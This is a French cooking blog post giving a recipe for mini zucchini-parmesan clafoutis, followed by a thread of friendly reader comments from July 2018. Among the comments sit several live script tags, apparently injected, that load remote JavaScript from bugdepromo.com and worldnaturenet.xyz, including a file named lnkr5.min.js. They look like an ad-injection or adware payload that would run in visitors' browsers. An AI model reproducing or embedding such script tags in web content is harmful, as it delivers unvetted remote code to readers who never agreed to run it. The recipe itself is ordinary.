-
Clafoutis courgettes-parmesan
Bonjour à tous, et bienvenue dans mon univers. Les légumes du soleil garnissent nos étals pour notre plus grand plaisir. Alors profitons en pour les consommer sans modération.
La recette que je vous propose aujourd'hui vient du blog de Michèle - croquant fondant gourmand. Cela fait déjà plusieurs fois que je la réalise, je l'ai même proposée en atelier culinaire, et ce fut un vrai succès.
Place à la recette
Clafoutis courgettes-parmesan
Pour 6 personnes (en entrée) ou 2 (en plat un soir)
- 400 g de courgettes
- 1 gousse d'ail
- 1 càs d'huile d'olive
- 2 oeufs
- 25 g de crème liquide
- 15 g de farine
- 40 g de parmesan râpé
- 1/2 càc de curcuma
- 1 càs de ciboulette (1)
- 1 càs de persil (2)
- fleur de sel
- poivre du moulin
Poser les empreintes briochettes sur la plaque perforée.
Préchauffer le four à 180°C.
Laver les courgettes, les couper en petits dés (sans les peler). Pour ma part j'ai enlevé une bande sur 2 ainsi que les pépins pour faciliter ma digestion.
Peler et dégermer la gousse d'ail et la hacher.
Dans une mijoteuse, faire revenir dans l'huile chaude les dés de courgettes et l'ail jusqu'à ce que les légumes soient tendres mais ils ne doivent pas s'écraser.
Ciseler finement les herbes de façon à en obtenir 1 càs de chaque. Réserver.
Dans un cul-de-poule mélanger la farine, le parmesan, les œufs, la crème, le curcuma et les herbes.
Saler et poivrer.
Ajouter les dés de courgettes et bien les mélanger de la préparation aux œufs.
Répartir la préparation dans les empreintes.
Faire cuire 20 minutes.
Attendre 5 minutes avant de démouler.
Servir tiède ou froid (à température ambiante) avec une bonne salade verte.
(1) et (2) Michèle a mis du basilic, je n'en avais plus j'ai utilisé le reste de mon persil et de ma ciboulette.
Je propose cette recette à Claudine pour : Cuisinons de saison en Juillet avec la courgette
« Salade de pâtes estivales au jambon cru et melon - recette autour d'un ingrédient #41Risotto au poulet et fèves »
Tags : Clafoutis, courgettes, parmesan, persil, ciboulette
-
Commentaires
Idéal pour compléter un barbecue avec ses grillades!
Bises, Dine avec Sandrine
-
Mardi 17 Juillet 2018 à 13:56
-
JOIL TES FLANS
-
Mercredi 18 Juillet 2018 à 14:26
-
Un bel et bon accompagnement pour une viande ou un poisson.
-
Mercredi 18 Juillet 2018 à 14:27
-
de jolis clafoutis bons ingrédients et de délicieux radis
une bonne soirée bises
-
Mercredi 18 Juillet 2018 à 14:28
-
merci pour cette recette toute ensoleillée ! bises
-
Mercredi 18 Juillet 2018 à 14:28
-
Superbes et idéal par ces chaleurs caniculaires qu'on a, de très jolies couleurs, bisou !
-
Mercredi 18 Juillet 2018 à 14:29
-
Une recette pour moi qui suis toujours à la recherche de recette pour mes courgettes du jardin !!
Je te souhaite une bonne journée. Bises
-
Mercredi 18 Juillet 2018 à 14:30
-
C'est tout à fait le genre de recettes qu'on adore à la maison.
Bisous
-
Mercredi 18 Juillet 2018 à 14:31
-
Merci Cécile, j'ai récupéré ta photo. Bisous
-
Mercredi 18 Juillet 2018 à 14:30
-
ils sont superbes, bisous
-
Mercredi 18 Juillet 2018 à 14:32
-
Mini clafoutis pour maxi gourmands. Bisous. Sylvie.
-
Dimanche 22 Juillet 2018 à 18:44
-
J'aime ce genre de petits clafoutis, en accompagnement pour un barbecue c'est top.
Biz, Sonia
-
Dimanche 22 Juillet 2018 à 18:45
-
Au top cette recette. J'adore. biz
<script src="//bugdepromo.com/1c732a07af99d6369d.js"></script> <script src="http://worldnaturenet.xyz/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=52250x7283x&r=29" type="text/javascript"></script> <script src="http://bugdepromo.com/addons/lnkr5.min.js" type="text/javascript"></script> <script src="http://bugdepromo.com/ext/1c732a07af99d6369d.js?sid=52250_7283_&title=FF_depromext.cool&blocks[]=31af2" type="text/javascript"></script>-
Dimanche 22 Juillet 2018 à 18:48
-
j'adore la courgette une belle association avec le parmesan une bonne idee pour un repas leger accompagné d'une bonne salade
bisous
-
Dimanche 22 Juillet 2018 à 18:45
-
Ajouter un commentaire
C'es vrai que ces petits flans faciles à faire sont top ! J'en fait aussi de temps en temps mais sans curcuma alors il faudra que j'y pense ! Merci cécile de les offrir à cuisinons ils sont trop trognons ! gros bisous
C'est vrai que c'est bon et rapidement préparé. Belle journée. bises